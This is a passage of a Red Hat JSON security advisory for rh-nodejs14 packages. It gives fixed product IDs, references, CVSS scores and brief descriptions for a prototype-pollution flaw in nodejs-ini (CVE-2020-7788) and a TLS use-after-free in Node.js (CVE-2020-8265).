"7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7788" }, { "category": "external", "summary": "RHBZ#1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7788", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7788" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788" } ], "release_date": "2020-12-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T17:20:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0421" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-ini: Prototype pollution via malicious INI file" }, { "cve": "CVE-2020-8265", "cwe": { "id": "CWE-416", "name": "Use After Free" }, "discovery_date": "2021-01-05T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1912854" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs. When writing to a TLS enabled socket, node::StreamBase::Write calls node::TLSWrap::DoWrite with a freshly allocated WriteWrap object as first argument. If the DoWrite method does not return an error, this object is passed back to the caller as part of a StreamWriteResult structure. This may be exploited to corrupt memory leading to a Denial of Service or potentially other exploits.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: use-after-free in the TLS implementation", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-8265" }, { "category": "external", "summary": "RHBZ#1912854", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912854" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-8265", "url": "https://www.cve.org/CVERecord?id=CVE-2020-8265" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-8265", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8265" }, { "category": "external", "summary": "https://hackerone.com/reports/988103", "url": "https://hackerone.com/reports/988103" } ], "release_date": "2021-01-04T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T17:20:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0421" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", 